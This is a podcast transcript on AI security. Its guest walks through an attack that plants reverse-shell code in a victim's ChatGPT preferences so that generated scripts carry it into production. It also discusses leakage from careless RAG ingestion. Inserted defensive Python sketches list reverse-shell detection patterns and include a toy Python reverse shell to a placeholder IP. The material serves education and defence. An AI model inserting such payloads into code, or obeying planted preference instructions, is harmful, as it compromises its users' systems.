The Hacker's Cache
The show that decrypts the secrets of offensive cybersecurity, one byte at a time. Every week I invite you into the world of ethical hacking by interviewing leading offensive security practitioners. If you are a penetration tester, bug bounty hunter, red teamer, or blue teamer who wants to better understand the modern hacker mindset, whether you are new or experienced, this show is for you.
The Hacker's Cache
#57 The AI Security Threat No One Sees Coming ft. Dino Dunn
In this episode of The Hacker’s Cache, Kyser Clark sits down with Dino Dunn, an AI security professional and cybersecurity instructor, to uncover the hidden risks most organizations overlook when adopting large language models and AI tools. From overlooked governance issues to the dangers of Retrieval Augmented Generation (RAG) and even how compromised AI preferences could enable stealthy breaches, Dino breaks down real-world attack scenarios and shares practical advice for staying ahead of emerging threats. Whether you’re a security professional, developer, or just curious about the future of AI, this conversation reveals the AI blind spot you can’t afford to ignore.
Connect with Dino Dunn on LinkedIn: https://www.linkedin.com/in/dino-dunn-cyber/
Connect
---------------------------------------------------
https://www.KyserClark.com
https://www.KyserClark.com/Newsletter
https://youtube.com/KyserClark
https://www.linkedin.com/in/KyserClark
https://www.twitter.com/KyserClark
https://www.instagram.com/KyserClark
https://facebook.com/CyberKyser
https://twitch.tv/KyserClark_Cybersecurity
https://www.tiktok.com/@kyserclark
https://discord.gg/ZPQYdBV9YY
Music by Karl Casey @ White Bat Audio
Attention Listeners: This content is strictly for educational purposes, emphasizing ETHICAL and LEGAL hacking only. I do not, and will NEVER, condone the act of illegally hacking into computer systems and networks for any reason. My goal is to foster cybersecurity awareness and responsible digital behavior. Please behave responsibly and adhere to legal and ethical standards in your use of this information.
Opinions are my own and may not represent the positions of my employer.
[Dino Dunn]
It's the boring thing to say, but I think governance is going to be a really, really important aspect of most organizations as they're building AIs. One of the biggest use cases most enterprises have is to create a RAG, which is Retrieval Augmented Generation. They try to basically add their own data into the RAG.
A lot of developers are really lazy when it comes to that. Organizations will take their intranet resources, their own internal documentation, and just add it into the RAG without paying attention to what they're adding.
[Kyser Clark]
Welcome to The Hacker's Cache, the show that decrypts the secrets of cybersecurity one byte at a time. I'm your host, Kyser Clark, and today I have Dino Dunn, who is an Offensive Security Engineer and Cybersecurity Instructor with a background that spans public sector infrastructure and financial industry defense. Dino brings a unique mix of hands-on technical skill and strategic insight.
He's led red and purple team operations, validated real-world mitigations, and actively hunts vulnerabilities across traditional and AI-driven systems. Dino's also the author of published work on Linux hardening and indirect prompt injection, and holds multiple certifications. So, Dino, thank you so much for coming on the show.
Go ahead and unpack some of your experience and introduce yourself to the audience.
[Dino Dunn]
Yeah, my name is Dino Dunn. I am a very enthusiastic cybersecurity practitioner. I love it.
It is, in my mind, one of the coolest jobs. One of my passions right now is very focused on AI security. I think it's the Wild West of security right now.
It certainly is getting quite a bit of attention. If I see another thing about MCP vulnerabilities, I might just throw my computer out the window. But I love it.
I think it's just one of the coolest fields.
[Kyser Clark]
Yeah, I agree. And that's why we're all here: me, you, and the audience. So the feeling is mutual, and I'm glad to have someone so enthusiastic on the show.
So I like your analogy of the AI being the Wild West of security right now. And that's a perfect analogy. And when it comes to AI security and maybe even using AI for ethical hacking, what advice would you give someone who kind of needs structured learning?
Like for me, I always like going after certifications because they're structured, right? And there's really no structured learning when it comes to AI right now.
I mean, right now you're getting in on the ground floor; people are pretty much doing their own methodologies and figuring it out as they go. So what recommendations would you have for someone who typically likes structured learning but also wants to get into AI?
[Dino Dunn]
Yeah, that's a really, really good question. So I think there's a few really good options. The first one that pops right into my mind is LearnPrompting.
They have a couple of different learning paths for things like prompt hacking, and they give structure and terminology to the different techniques. They also have an AI red teaming certification, which is a great way to methodically go through it.
They have really good speakers in that course, which is really cool. Jason Haddix talks about real-world AI applications that he's experienced, and it's really cool.
I can't say enough nice things about Jason Haddix's talk specifically.
[Kyser Clark]
A lot of those I didn't know about. I didn't know about Jason Haddix's. I'm actually going to be attending his attacking AI in-person training at BSides Columbus here in a couple of months.
So I'm pretty excited for that. And that's going to be like my introduction to AI testing. And then I'm going to probably re-watch this episode and just go through those materials that you just mentioned.
So thanks for providing those. Because it's been something I've been struggling with. I was like, man, I don't really know where to go for AI stuff.
It's kind of all over the place; like you said, it's the Wild West. And like I said, I like the structured stuff, official courses. I'm a self-paced kind of person, but I need at least some kind of guide.
So those are really good that you mentioned all that. So I do have some more questions on AI and large language models. But before we do that, we need to dive into Security Mad Libs.
So are you ready for Security Mad Libs?
[Dino Dunn]
Yes, I think so.
[Kyser Clark]
Yeah, it's kind of like Family Feud's Fast Money round. It's the best analogy I can make. So for those audience members who are new to the show, Dino will have 40 seconds to answer five Security Mad Libs.
If he answers all five in 40 seconds or less, he gets a bonus Mad Lib that's unrelated to cybersecurity, and it'll be a fun, authentic conversation. Dino, don't provide an explanation while you're answering them.
So you'll get the opportunity to provide an explanation on what I would consider the most interesting topic. And if I choose a topic that you're less interested in, feel free to change it too. Anyways, here we go with Security Mad Libs.
All right, first question. Dino, the most painful bug I ever dealt with was?
[Dino Dunn]
Log4j.
[Kyser Clark]
The most useful alias on my terminal is?
[Dino Dunn]
LS.
[Kyser Clark]
When I teach someone about cybersecurity, I always start with?
[Dino Dunn]
Learn Linux.
[Kyser Clark]
My go-to method for OSINT is?
[Dino Dunn]
Google.
[Kyser Clark]
The biggest threat nobody is talking about is?
[Dino Dunn]
I'm gonna say LLM security, but I think a lot of people would.
[Kyser Clark]
That's 37 seconds. So congratulations, you beat the buzzer. And yeah, I agree with that last point.
There are a lot of people talking about it, but it is an underrated threat. A lot of people are just using it all willy-nilly, and that's the danger. So many people don't understand the risks.
Security people, we understand the risks, but the average population does not. So it is a big threat that non-security people aren't talking about. Security people, we are talking about it.
And we're gonna be talking about it pretty much this whole episode because that's where your passion is. So we're gonna stick on that subject. But before we do that, we gotta get to the bonus Mad Libs.
Here it is. You can explain your answer as much or as little as you want to. You can even dodge the question entirely.
So here it is. If I were a kitchen utensil, I would be a knife.
[Dino Dunn]
Ninja smoker. That's a better answer. We're going with ninja smoker.
That thing is so cool.
[Kyser Clark]
I mean, I kind of have an idea what a ninja smoker is. I've never used one. So yeah, why would you be a ninja smoker?
[Dino Dunn]
I mean, it's just such a cool little tool. And I love like, nothing beats like smoked meats. And I so, so want one.
And yeah, with my luck, I'll get it and it'll suck.
[Kyser Clark]
But are they like, are they like small smokers you just like put in a kitchen?
[Dino Dunn]
Yeah, I think you can. I think you should probably put it outside.
[Kyser Clark]
Oh, yeah, we had one. We had a smoker, but it wasn't a full-size smoker.
Yeah, you're right. Smoked meats are great for sure.
[Dino Dunn]
Once upon a time, I had a full-size smoker. This was when I was in Columbus, and it was great.
I loved it. It was fun; I smoked everything for probably the first month I had it.
But I was young and dumb, and I didn't put a cover over it in winter. It ruined the thing.
It was awesome while it lasted.
[Kyser Clark]
But what a tragedy.
[Dino Dunn]
Yeah, it was my fault. I learned.
[Kyser Clark]
Yeah, so if I was asked that question, my answer would be a knife. I thought about it before the show because I'm the one that puts the questions in the show. And when you said knife, I was like, oh, that's what I was going to say.
So the reason I would say knife is because, to me, a knife is incredibly useful, but dangerous if not used correctly or if you're not careful. That's kind of the mentality I have. So that's why I would pick knife.
So your most interesting response. Hmm, let's see here. I would say probably the most painful bug I ever dealt with: Log4j.
So I'm sure there's someone in the audience, maybe some newer people in security, who aren't sure what Log4j is. I know of it.
I didn't have to deal with the pain of it because my role at the time didn't touch it. But I remember it being a huge deal, and I read up on it as much as I could because I wanted to understand it.
So explain that. Why was it the most painful bug you ever dealt with?
[Dino Dunn]
In my mind, the first time you really do security is the first time you have to deal with a problem that's your problem, with no one else there. That's when it's a big thing. For me, our senior had a medical emergency and was totally, totally unreachable.
And it all fell on me. Here's a vulnerability, and it's like, dude, you've got to do the thing.
I was so nervous. I was really worried I was going to totally donk it up.
And I remember it was the holidays. It was hard to get a hold of people; it was hard to get everyone together for the response.
But I remember having to cool down and just go through the steps. I remember talking to our vulnerability management vendor, asking, hey, when do we get a plugin to scan for this?
How do I look for this? It was the first time I was totally alone working through all the problems. And it was kind of cool, because even though I say I was alone, security is a team effort.
I had to work with all the other teams to make sure the scan wouldn't break anything. All these different pieces had to come together.
It was really painful, but it was a good experience at the end of the day.
[Kyser Clark]
Yeah, that definitely sounds stressful, something like that coming out of nowhere. I would say the closest thing for me was PrintNightmare.
I was in the Air Force doing defensive operations at the time. And obviously there are printers, and anybody could map a printer. But after PrintNightmare, we switched to a policy where only admins could map printers.
So I had to map dozens of users to printers, and it felt like it ate all my time. And I mean, it's printers.
It's so frustrating. No one likes printers. But at the same time, everyone really appreciated me, because no one likes to deal with printers.
So it's a double-edged sword. Everyone loves you, but at the same time you're thinking, I really hate messing with these printers.
That was probably the closest thing I had to a wide-scale vulnerability like that, one that was my problem to solve.
[Dino Dunn]
Actually, I think I've had fun with printers in every role I've ever had. When I worked for the government, one of the things I was in charge of was check printers. They're these big, massive printers.
And it was a nightmare trying to figure out which vulnerabilities affected them. Nothing was as secure as anyone said. People would say, yeah, don't worry, it's secure.
I'd be like, are you sure? And then just nope. That was not the case.
[Kyser Clark]
Nice. Yeah, security is an enigma sometimes, I suppose. So, moving back onto the topic of AI and LLMs.
So I came across your LLMs and C2 post, and it seemed pretty interesting to me. You've experimented with leveraging ChatGPT as a command and control channel.
What are the real-world risks of LLM-based persistence or execution? And do you think enterprises understand this vector?
[Dino Dunn]
I think it'll be really interesting to see how it all shakes out. And we're going to start seeing more and more. I think as a C2 specific, it'll be kind of interesting.
It won't necessarily be like the traditional thing you're expecting. Persistence, for sure, I think will be the really big one. Because if you just suggest like a reverse shell into code and you could try to obfuscate it however you wanted to, a lot of the time it's going to end up in the code.
And people aren't going to pay attention to what they're getting. You can pivot from there into the issues with vibe coding, where people who don't totally understand what they're doing will get a piece of code and just run it. And don't get me wrong.
Every now and then, I've vibe coded a few scripts and stuff. But I did understand what the security risk was. It's almost always in a sandbox.
So it's cool. But then you have people doing it in production who probably shouldn't be. Or should make sure to go through all the proper tests and think things through.
And I think it makes a really good persistence mechanism. Because again, there's going to be people who maybe aren't scrutinizing the code they're getting. And they're going to just import it and not think about it.
Especially when we have developers on stricter guidelines or things like that. It's really easy to see that coming up.
[Kyser Clark]
Yeah, for sure. So how would an attacker... You're saying an attacker would inject shellcode into ChatGPT, for example?
And then somehow that could end up in someone else's vibe coding? How does that work exactly?
[Dino Dunn]
Yeah, so the attack scenario is: I'm the attacker. I've gotten into some institution's enterprise ChatGPT instance, and I've added a couple of lines of suggested code for ChatGPT to include in most scripts, or as many as I can. You can set it in the preferences.
You could also do it to someone's personal ChatGPT instance, where you just set it in their preferences, and then it'll include that shellcode or any reverse shell.
The nice thing is, some of the chain-of-thought models will think about it and question why it's there.
Or they'll mention it in the response to the user. But they don't always. And that's another thing that makes working with LLMs a little bit more challenging.
Because it's not always a binary yay or nay. You'll get anything and everything in between.
[Kyser Clark]
Yeah, that's really interesting. So let me make sure I have this right. Let's say I'm an attacker and I want to gain access to a company.
The first step would be getting access to a developer's enterprise, or even personal, LLM instance, maybe through phishing or some other way. Then I go into their preferences and put in that shellcode.
And then when they vibe code, there's a good chance that shellcode will get put into their code. And if they're not paying attention, they'll put that in production, and that could get me access into the enterprise, the company I'm targeting.
[Dino Dunn]
Yep, that's a good summary.
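To make the defensive side of this concrete (an illustrative sketch, not something from the episode): one cheap guardrail is scanning LLM-generated code for common reverse-shell indicators before running it. The pattern list here is hypothetical and far from complete; a real review process would lean on proper SAST and dependency-scanning tooling rather than keyword matching.

```python
import re

# Hypothetical indicator patterns -- real review would use far more robust
# tooling than a keyword list like this.
SUSPICIOUS_PATTERNS = [
    r"socket\.socket\(",                 # raw socket creation
    r"/dev/tcp/",                        # bash reverse-shell idiom
    r"subprocess\.(Popen|call|run)\(",   # spawning external processes
    r"nc\s+-e",                          # netcat with command execution
    r"base64\.b64decode\(",              # often used to hide payloads
]

def flag_suspicious_lines(generated_code: str) -> list[tuple[int, str]]:
    """Return (line_number, line) pairs that match any indicator pattern."""
    hits = []
    for lineno, line in enumerate(generated_code.splitlines(), start=1):
        if any(re.search(p, line) for p in SUSPICIOUS_PATTERNS):
            hits.append((lineno, line.strip()))
    return hits

# A toy "LLM-suggested" snippet containing a planted reverse shell.
snippet = (
    "import socket, subprocess\n"
    "s = socket.socket()\n"
    "s.connect(('203.0.113.5', 4444))\n"
    "subprocess.Popen(['/bin/sh'], stdin=s.fileno())\n"
)
for lineno, line in flag_suspicious_lines(snippet):
    print(f"line {lineno}: {line}")  # flags lines 2 and 4
```

This is only a tripwire, not a control: obfuscated payloads would slip past it, which is exactly why unreviewed vibe-coded output in production is the risk Dino describes.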
[Kyser Clark]
Yeah, that's sick. I didn't even think about that. So that's pretty cool.
Thanks for explaining that. And I mean, that's deadly.
Because, I mean, I use ChatGPT basically every day, and I don't check my preferences every day. So I need to go check my preferences to make sure they're not compromised now. So thanks for that. But yeah, that's pretty cool.
But yeah, like I said, we're not checking our preferences every day. So that's a really interesting attack vector that I never even knew about until just now. That's really cool.
[Dino Dunn]
And we're going to see so many more. I was telling my boss about this.
I'm like, we're going to see all these cool new attack vectors, all this cool stuff. She was just looking at me confused.
Like, none of that is good. Why are you excited? I'm like, I don't know.
I'm excited about it.
[Kyser Clark]
Yeah, as an ethical hacker, it makes you excited. Everyone else gets super scared. Because they don't understand as much.
And they don't think like an attacker. Which makes us the weird ones. Which is totally OK.
By the way, if you think like an attacker. You are weird in society's eyes. But you're cool with us.
Yeah, so your reverse pyramid model for the AI attack surface is a powerful visual. Where do you think most security teams are failing in this model? And what's one step they could take today to move toward deeper AI stack coverage?
[Dino Dunn]
I think governance, and it's the boring thing to say, but I think governance is going to be a really, really important aspect of most organizations as they're building AIs. One of the biggest use cases most enterprises have is to create a RAG, which is Retrieval Augmented Generation. They basically try to add their own data into the RAG.
But a lot of developers are really lazy when it comes to that. And again, no offense to any developers listening. You could be a very, very good developer paying attention to all of this. Some aren't, and as long as some aren't, it's going to be an issue.
What ends up happening is organizations will take their intranet resources, their own internal documentation, and just add it into the RAG without paying attention to what they're adding.
They're like, it's just internal documents, it's fine. Unfortunately, mixed in with those internal documents in a lot of orgs' intranets is stuff you don't want ingested by everybody.
I'm going to reference Jason Haddix again. In one of his talks, he mentioned an org that did not pay attention to what they added into their RAG, and it had a lot of human resources documentation when it was supposed to be for QA testing.
So what ended up happening was everyone could see human resources requests when they were trying to look up a part number or something like that.
And in a lot of intranets, like Confluence and things like that, you'll see people add things they shouldn't. I know I've seen plain-text passwords, HR docs, whatever you can think of.
Someone has probably said, I'm going to add this to the intranet, not thinking about security, not thinking about who could see it. That gets mixed into the RAG, and suddenly you have an LLM that can tell you, yeah, so-and-so was written up. And it's just like, oh my gosh, I don't want everyone to see that.
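To make the ingestion problem concrete (again an illustrative sketch, not from the episode): a RAG pipeline can quarantine documents that trip sensitivity checks before they ever reach the index. The patterns and labels below are hypothetical; a real pipeline would rely on DLP tooling and document classification labels, not a handful of regexes.

```python
import re

# Hypothetical sensitivity checks for illustration only.
SENSITIVE_PATTERNS = {
    "credential": re.compile(r"password\s*[:=]", re.IGNORECASE),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "hr_record": re.compile(r"\b(performance review|written up|disciplinary)\b",
                            re.IGNORECASE),
}

def partition_for_ingestion(docs: list[str]) -> tuple[list[str], list[tuple[str, str]]]:
    """Split docs into (safe_to_index, quarantined) before they reach the RAG index."""
    safe, quarantined = [], []
    for doc in docs:
        # First label whose pattern matches, or None if the doc looks clean.
        hit = next((label for label, pat in SENSITIVE_PATTERNS.items()
                    if pat.search(doc)), None)
        if hit:
            quarantined.append((hit, doc))
        else:
            safe.append(doc)
    return safe, quarantined

docs = [
    "Part number 8842 maps to the rev-C motherboard.",
    "admin password: hunter2",
    "Q3 performance review notes for J. Smith",
]
safe, quarantined = partition_for_ingestion(docs)
print(len(safe), len(quarantined))  # 1 safe doc, 2 quarantined
```

The point is the gate's placement, not its sophistication: filtering has to happen before indexing, because once the LLM can retrieve a document, access control on the original file no longer protects it.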
[Kyser Clark]
Yeah. Correct me if I'm wrong, but that sounds like one of the other presentations I watched, from Black Hills Information Security. I forget who the presenter was.
Forgive me for forgetting your name. But the whole premise was similar. You would ask Copilot something like, hey, what is John doing at noon on Wednesday? And it would say, according to my information, John has this on Wednesday.
Because Copilot gets integrated with all the intranet stuff, like you said: everyone's calendars, everyone's emails.
And the risk was you could get information from your coworkers' workstations, or just learn more about your coworkers than you should, right?
You can ask Copilot, hey, what can you tell me about this person? And it'll say, this person has meetings every Wednesday. It gives too much information.
And that's definitely a problem, right? So, is that similar, or is that the same thing?
[Dino Dunn]
Totally similar. For example, say you had an intranet thing where you do employee reviews. Maybe that gets sucked in, and then anyone could see those employee reviews.
The LLM has it for its retrieval augmented generation. You have developers who worked really hard on this, and then it's giving out too much information.
It can absolutely be used in bad ways, and it's a rough one to fix.
[Kyser Clark]
Yeah. So, all the negative things about AI and LLMs aside, how are you using AI day to day?
Are you a big fan of it? Or do you kind of avoid it because you understand the risks? What's your take on using it for personal use, or even for work?
[Dino Dunn]
I definitely think there's always going to be a use case for it. And everyone's going to have a different use case. I think it's one of my favorite go-to things when I'm correcting my syntax.
There's nothing worse than missing a comma or anything like that. Where you're so close to getting the script to run. You're so close to getting something to go.
I think that's one of my favorite use cases. I've gotten so annoyed at syntax things. And I mean, image generation is always going to be fun.
I like to say I try to use it sparingly. I always have to walk the line: should I be putting this into ChatGPT?
Which, super important: don't do the shadow IT thing. I think there are plenty of good stories of folks doing that, where they input company secrets, and it's like, nope, nope, nope.
If you're using the enterprise version, I think it's just a checkbox to make sure it doesn't train on your data.
If you're not using the enterprise version, and you're maybe using your own personal ChatGPT instance and emailing things to yourself: that's shadow IT. Don't do that.
But I think there are use cases. There's always a great use case for AI image generation in every presentation. Or not, I don't know. Maybe you're an art student, and maybe that's total cheating for you.
[Kyser Clark]
I'm a huge fan of AI. I've been an advocate for it for a while. And I use it every day for pretty much everything.
And for my personal use, man, I definitely overshare things I probably shouldn't in ChatGPT.
Because it just makes everything so efficient and easy. I'm definitely sacrificing privacy for speed and ease, I guess is the best way to put it.
Like, for example, just weird life things. Like, for example, trying to figure out which provider is the best for my lawn care. I'll be like, alright, this guy says he can do this, this, and this for this price.
This other guy says he can do this, this, and this for this price. And I don't know which one to pick between these two lawn care services. Which one should I go with, ChatGPT?
And it'll give me some recommendations and pros and cons that I didn't consider. I did the same thing when I purchased my home. Just things that aren't even related to my job.
Like, just everyday stuff that I use it for. I use it for content creation. I mean, I use it to help generate some of these questions.
I use it to structure a lot of my content. So ChatGPT definitely knows a lot about me. We'll see how much of a problem that's going to be.
But I did draw a line, actually, the other day, when I was uploading a podcast episode, what was it, a couple of days ago at this point.
I use a podcast hosting platform, and when I upload a podcast, if I want to get the chapters in there, I have to manually hand-enter each chapter title and timestamp.
And ChatGPT came out with agent mode, which basically uses a computer for you. It moves the mouse and does things for you. And I'm like, huh.
I don't really like hand-jamming in all these timestamps and titles. I can't just copy and paste the whole list; I have to do it one at a time.
And it's actually a tedious process. I wish they'd fix it. But it is what it is.
Because YouTube, I can just copy and paste it in the description. It just automatically works. But the podcast hosting platform is not that way.
So I have to hand-jam it all in there. I'm like, dude, I hate this. I wonder if a ChatGPT agent can do this.
And basically it thought for like six minutes and got to Buzzsprout, the podcast hosting platform I use. It got to the login screen.
It's like, Hey, give me your credentials to log in so I can do this. And I'm like, I'm not giving you my credentials to my podcast. And that's where I drew the line.
[Dino Dunn]
Slightly off topic. Do you follow, I think it's Marcus Hutchins on LinkedIn?
[Kyser Clark]
Maybe. It's not ringing a bell. There's a good chance, though; I'm connected with a lot of people.
[Dino Dunn]
He's really famous for malware research; I want to say WannaCry is his thing. He was using ChatGPT and asking it questions.
He was like, okay, who figured out this malware sample, yada yada. And ChatGPT goes: you, you did. And he was just like, this is so freaky.
It was such a cool post. And I'm like, oh my gosh, this is such a weird privacy concern now. That's another one I see being a really interesting thing with AI in the future.
I think privacy will be a really big, interesting field. I hope so, anyway. It might be that no one cares,
except that very dedicated group of people who really care about privacy. They're probably already very worried about all of this.
[Kyser Clark]
There was a talk at BSides Pittsburgh about privacy that was really good. I really enjoyed that one.
And I'm like, man, it's so inconvenient to protect your privacy. It's a lot of work, and I feel like I walk a fine line.
I'm not an extreme privacy person, but I am pretty private. I am aware of what I'm putting into ChatGPT; when I put information in, I know the risk going in.
I'm not putting in my Social Security number or, like I said earlier, my credentials. But ChatGPT definitely knows what I'm doing day to day. I opened ChatGPT one time and it was like, hey, sounds like you're trying to buy a house.
How's the home-buying process? I was like, that's scary, bro. You know exactly what I'm doing right now.
This is crazy. But it's my fault, because I gave it the information. So I have myself to blame. Still, it was kind of cool.
And I kind of like the future we're heading toward. Privacy aside, man, I think it would be cool to have a digital assistant, right? Because I can't afford an assistant.
I don't have the extra money to hire somebody, so it's really nice to have something to help me with my work. And I think it would be cool to have an actual digital assistant that I don't have to prompt.
I was telling my coworkers about this one time. It would be cool if I'm just walking around and my AI assistant calls me on the phone: hey, that thing you were interested in, here's the update on it.
For example, there was something I wanted to follow. I can't remember what it was exactly, but I don't have the time and energy to constantly Google for updates on it. And I'm like, man, it would be cool if I could just say, hey, ping me when there's a new update on this piece of news I'm interested in. But that capability doesn't exist yet.
That's the kind of capability I think would be cool: an actual AI assistant that communicates with me without my prompting it. I could just be walking down the road or chilling in the house, and it calls me on the phone: hey, that thing you were interested in a month ago, here's an update.
I'm like, that'd be pretty cool. Anyway, enough with the rambling.
We are running out of time. We need to do the final question. So here it is.
Do you have any additional cybersecurity hot takes or hidden wisdom you'd like to share?
[Dino Dunn]
Yeah, I saw this the other day, and it was some of the best advice I've seen in a really long time. They summarized it with a meme: one turkey cooked at 900 degrees for an hour,
and another cooked at 350 for two or three hours. If you try to focus on everything all at once, you're going to burn yourself out.
You're going to fizzle. You're going to get nowhere. Whereas if you focus on one or two things, you can really grow, get to that next step, and learn the things you need to learn.
[Kyser Clark]
Yeah, that's a really good analogy. It reminds me of, so I'm a huge fan of the Real AF podcast. If you've never heard of it, definitely check out the Real AF podcast.
Shout out to Andy Frisella. He always makes an analogy about baking a cake. Basically, he says anything you want to achieve in life takes time, and you can have the perfect cake recipe,
but if you put the cake in at 900 degrees and cut the time in half, you're going to burn the cake. Good things take time; that's the moral of the story. So yeah, same thing.
Like you said, working on a bunch of things at once can absolutely burn you out. So thanks for sharing that wisdom. So Dino, where can the audience get a hold of you if they want to connect with you?
[Dino Dunn]
LinkedIn. I'm always checking my LinkedIn.
[Kyser Clark]
That's how I got a hold of you, and that's how I get a hold of pretty much every guest.
Actually, guys, if you're a regular viewer or listener, you might be thinking, man, everyone's on LinkedIn. Why does he never have people from Twitter? Because I don't use Twitter.
I always contact people through LinkedIn. I've probably missed some awesome guests by only using LinkedIn. But yeah, Dino, man, thank you so much for being here.
Thanks for your insights and thanks for the conversation. It has been fun.
[Dino Dunn]
Stay curious. The curious people are the most fun ones to work with.
[Kyser Clark]
Perfect. Audience, the best place to get a hold of me is the YouTube comments. So if you have a question or a comment, drop it in the YouTube comments.
And if you're on audio, then load up this podcast episode on YouTube and drop a comment. That's the best place to get a hold of me.
My LinkedIn inbox is getting filled up. Unfortunately, it's actually stressing me out, dude.
So yeah, YouTube comments. I never get tired of answering YouTube comments. But LinkedIn, I don't know.
It's a little bit different, a different beast, I guess. All right, audience.
Thank you so much for watching. Thanks for listening. Hopefully, I see you on the next episode.
Until then, this is Kyser signing off.